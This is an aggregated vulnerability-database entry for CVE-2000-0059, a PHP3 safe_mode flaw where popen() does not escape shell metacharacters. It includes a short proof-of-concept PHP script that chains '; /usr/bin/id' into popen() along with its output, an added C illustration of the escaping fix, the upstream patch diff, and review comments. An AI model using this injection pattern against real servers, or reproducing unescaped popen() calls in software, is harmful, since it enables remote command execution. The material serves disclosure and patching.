CVE-2000-0059
CVSS 10.0
Published: 2000-01-04 00:00:00
Revised: 2008-09-10 15:02:41

[Original] PHP3 with safe_mode enabled does not properly filter shell metacharacters from commands that are executed by popen, which could allow remote attackers to execute commands.


[CNNVD] PHP3 'safe_mode' failure vulnerability (CNNVD-200001-007)

        PHP3 with safe mode enabled does not correctly filter shell metacharacters from the commands executed by the affected functions. A remote attacker can exploit this to execute commands.

- CVSS (base score)

CVSS score: 10 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause complete system shutdown]
Access complexity: LOW [no special access conditions required]
Access vector: [--]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

cpe:/a:php:php:3.0       PHP PHP 3.0
cpe:/a:php:php:3.0.1     PHP PHP 3.0.1
cpe:/a:php:php:3.0.2     PHP PHP 3.0.2
cpe:/a:php:php:3.0.3     PHP PHP 3.0.3
cpe:/a:php:php:3.0.4     PHP PHP 3.0.4
cpe:/a:php:php:3.0.5     PHP PHP 3.0.5
cpe:/a:php:php:3.0.6     PHP PHP 3.0.6
cpe:/a:php:php:3.0.7     PHP PHP 3.0.7
cpe:/a:php:php:3.0.8     PHP PHP 3.0.8
cpe:/a:php:php:3.0.9     PHP PHP 3.0.9
cpe:/a:php:php:3.0.10    PHP PHP 3.0.10
cpe:/a:php:php:3.0.11    PHP PHP 3.0.11
cpe:/a:php:php:3.0.12    PHP PHP 3.0.12
cpe:/a:php:php:3.0.13    PHP PHP 3.0.13

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0059
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0059
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-007
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/911
(UNKNOWN)  BID  911

- Vulnerability information

PHP3 'safe_mode' failure vulnerability
Critical    Input validation
2000-01-04 00:00:00    2005-10-20 00:00:00
Remote
        PHP3 with safe mode enabled does not correctly filter shell metacharacters from the commands executed by the affected functions. A remote attacker can exploit this to execute commands.

- Advisory and patch


- Vulnerability information (19708)

PHP <= 3.0.13 'safe_mode' Failure Vulnerability (EDBID:19708)
php remote
2000-01-04 Verified
0 Kristian Koehntopp
N/A
source: http://www.securityfocus.com/bid/911/info

PHP Version 3.0 is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

Because it runs on a web server and allows user-supplied (and possibly security-relevant) code to be executed there, PHP has a built-in security feature called 'safe_mode' that is meant to confine executed commands to the environment in which PHP operates.

This is done by forcing every function that executes shell commands to pass the command through EscapeShellCmd(), which neutralises shell metacharacters, and, when safe_mode_exec_dir is set, by prefixing the command name with that directory so that only programs found there are run.

In the affected versions, however, popen() never passes its command string through EscapeShellCmd(), so PHP applications running in 'safe_mode' that make use of popen() can be exploited: metacharacters such as ';' in the command string reach the shell unchanged and chain arbitrary commands, which then run as the web server user, as the proof of concept below shows.

<?php
$fp = popen("ls -l /opt/bin; /usr/bin/id", "r");
echo "$fp<br>\n";
while($line = fgets($fp, 1024)):
printf("%s<br>\n", $line);
endwhile;
pclose($fp);

phpinfo();
?>

which gave me the following output

1
total 53 
-rwxr-xr-x 1 root root 52292 Jan 3 22:05 ls 
uid=30(wwwrun) gid=65534(nogroup) groups=65534(nogroup) 

and from the configuration values of phpinfo():

safe_mode 0 1		
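To make concrete what the one-line change in the patch does, here is an added C example (not PHP source and not Koehntopp's code) that re-implements the two pieces involved: the "<exec_dir>/<arg>" prefixing that safe_mode applies, and an escapeshellcmd-style escaper that backslashes shell metacharacters before the string reaches popen(). The metacharacter set, the exec dir path /usr/local/php/bin and all helper names are assumptions made for the illustration; PHP's real escapeshellcmd() also leaves matched pairs of quotes alone, which this one does not. The last helper demonstrates the caveat that escaping alone does not bound which program gets run.

```c
/* Added illustration of the popen() fix: escape shell metacharacters in the
 * command before the shell sees it. Not PHP's _php3_escapeshellcmd; a
 * stand-alone model with assumed names and an assumed metacharacter set. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Metacharacters the assumed escaper neutralises. Modelled on the list the
 * PHP manual gives for escapeshellcmd(); unlike PHP, quotes are escaped
 * unconditionally here (PHP leaves matched pairs alone). */
static const char SHELL_META[] = "#&;`|*?~<>^()[]{}$\\\n'\"";

/* Return a malloc'd copy of cmd with every metacharacter backslash-escaped. */
char *escape_shell_cmd(const char *cmd)
{
    size_t n = strlen(cmd);
    char *out = malloc(2 * n + 1);          /* worst case: every byte escaped */
    size_t j = 0;
    if (!out)
        return NULL;
    for (size_t i = 0; i < n; i++) {
        if (strchr(SHELL_META, cmd[i]) != NULL)
            out[j++] = '\\';
        out[j++] = cmd[i];
    }
    out[j] = '\0';
    return out;
}

/* Build the command the way safe_mode does ("<exec_dir>/<arg>", cf. the
 * snprintf in the patch) and, for escape != 0, apply the escaping the patch
 * added before popen(). escape == 0 models the pre-patch behaviour. */
char *build_safe_mode_cmd(const char *exec_dir, const char *arg, int escape)
{
    size_t n = strlen(exec_dir) + 1 + strlen(arg) + 1;
    char *buf = malloc(n);
    if (!buf)
        return NULL;
    snprintf(buf, n, "%s/%s", exec_dir, arg);
    if (!escape)
        return buf;
    char *esc = escape_shell_cmd(buf);
    free(buf);
    return esc;
}

/* Crude count of how many commands /bin/sh -c would run for this string:
 * one plus the number of unescaped ; | & and newline separators, with "&&"
 * and "||" counted once. Ignores quoting; enough to compare before/after. */
int shell_command_count(const char *cmd)
{
    int count = 1;
    for (const char *p = cmd; *p; p++) {
        if (*p == '\\' && p[1]) { p++; continue; }     /* skip escaped byte */
        if (*p == ';' || *p == '\n') count++;
        else if (*p == '|' || *p == '&') {
            count++;
            if (p[1] == *p) p++;                        /* "&&" / "||" */
        }
    }
    return count;
}

/* Escaping does not restrict which program runs: "../../bin/sh" contains no
 * metacharacter at all. Reject a program name (first token) that could leave
 * exec_dir, i.e. anything containing '/' or equal to "." or "..". */
int command_name_stays_in_exec_dir(const char *arg)
{
    size_t len = strcspn(arg, " \t");                   /* first token */
    if (len == 0)
        return 0;
    if (memchr(arg, '/', len) != NULL)
        return 0;
    if (len <= 2 && strncmp(arg, "..", len) == 0)
        return 0;
    return 1;
}

int main(void)
{
    const char *exec_dir = "/usr/local/php/bin";        /* assumed setting */
    const char *arg = "ls -l /opt/bin; /usr/bin/id";    /* the PoC string */
    char *before = build_safe_mode_cmd(exec_dir, arg, 0);
    char *after  = build_safe_mode_cmd(exec_dir, arg, 1);
    printf("before patch: %s  (%d shell commands)\n", before, shell_command_count(before));
    printf("after patch:  %s  (%d shell commands)\n", after, shell_command_count(after));
    printf("traversal name accepted? %d\n", command_name_stays_in_exec_dir("../../bin/sh -c id"));
    free(before);
    free(after);
    return 0;
}
```

shell_command_count is deliberately crude: its job is to show that the proof-of-concept string is two shell commands before the patch and one afterwards, not to parse shell syntax. The program-name check is the part the patch does not contain; it is what a practitioner would add if the rest of safe_mode did not already enforce it.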

- Vulnerability information

13628
PHP3 safe_mode Shell Metacharacter Filter Failure
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2000-01-03 Unknown
2000-01-03 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

PHP3 'safe_mode' Failure Vulnerability
Input Validation Error 911
Yes No
2000-01-04 12:00:00 2009-07-11 01:56:00
This vulnerability was posted to the Bugtraq mailing list by Kristian Koehntopp <kris@koehntopp.de> on Mon, 3 Jan 2000.

- Affected program versions

PHP PHP 3.0.13
PHP PHP 3.0.12
PHP PHP 3.0.11
PHP PHP 3.0.10
PHP PHP 3.0.9
PHP PHP 3.0.8
PHP PHP 3.0.7
+ Sun 2800 Workgroup NTT/KOBE 2800WGJ-KOBE
PHP PHP 3.0.6
PHP PHP 3.0.5
PHP PHP 3.0.4
PHP PHP 3.0.3
PHP PHP 3.0.2
PHP PHP 3.0.1
PHP PHP 3.0

- Vulnerability discussion


- Exploit

As per the message attached in the 'Credit' section.


- Solution

Index: functions/file.c
===================================================================
RCS file: /repository/php3/functions/file.c,v
retrieving revision 1.229
retrieving revision 1.230
diff -u -r1.229 -r1.230
--- functions/file.c 2000/01/01 04:31:15 1.229
+++ functions/file.c 2000/01/03 21:31:31 1.230
@@ -26,7 +26,7 @@
| Authors: Rasmus Lerdorf <rasmus@lerdorf.on.ca> |
+----------------------------------------------------------------------+
*/
-/* $Id: file.c,v 1.229 2000/01/01 04:31:15 sas Exp $ */
+/* $Id: file.c,v 1.230 2000/01/03 21:31:31 kk Exp $ */
#include "php.h"

#include <stdio.h>
@@ -51,6 +51,7 @@
#include "safe_mode.h"
#include "php3_list.h"
#include "php3_string.h"
+#include "exec.h"
#include "file.h"
#if HAVE_PWD_H
#if MSVC5
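Review bot: the new `#include "exec.h"` is evidently here for the prototype of `_php3_escapeshellcmd`, which the popen hunk further down calls; if that is the only symbol needed, a one-line forward declaration in file.c would avoid pulling the whole exec module's header into the file I/O code, but either way a short comment on the include stating why it was added would help the next reader.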
@@ -575,7 +576,7 @@
pval *arg1, *arg2;
FILE *fp;
int id;
- char *p;
+ char *p, *tmp = NULL;
char *b, buf[1024];
TLS_VARS;

@@ -600,7 +601,11 @@
} else {
snprintf(buf,sizeof(buf),"%s/%s",php3_ini.safe_mode_exec_dir,arg1->value.str.val);
}
- fp = popen(buf,p);
+
+ tmp = _php3_escapeshellcmd(buf);
+ fp = popen(tmp,p);
+ efree(tmp); /* temporary copy, no longer necessary */
+
if (!fp) {
php3_error(E_WARNING,"popen(\"%s\",\"%s\") - %s",buf,p,strerror(errno));
RETURN_FALSE;
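Review bot: the escaping is applied to the fully assembled command in `buf`, i.e. after `php3_ini.safe_mode_exec_dir` has already been joined with `"%s/%s"`, so any metacharacter in the admin-configured directory path gets a backslash too; escaping `arg1->value.str.val` before the `snprintf` would leave the configured prefix untouched and escape only the user-controlled part. Also note what `_php3_escapeshellcmd` does not do: it neutralises `;`, `|` and friends but never inspects path components, and nothing in this hunk rejects a program name containing `/` or `..`, which after the `"%s/%s"` join still names a path outside `safe_mode_exec_dir`; that check must exist elsewhere or be added here. Minor: the `E_WARNING` on failure prints `buf` although the string actually handed to `popen` was `tmp`, so printing `tmp` would show what was really run. The `efree(tmp)` immediately after `popen` is correct, since the child shell already has its own copy of the string by the time `popen` returns.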

- Related references

 

 
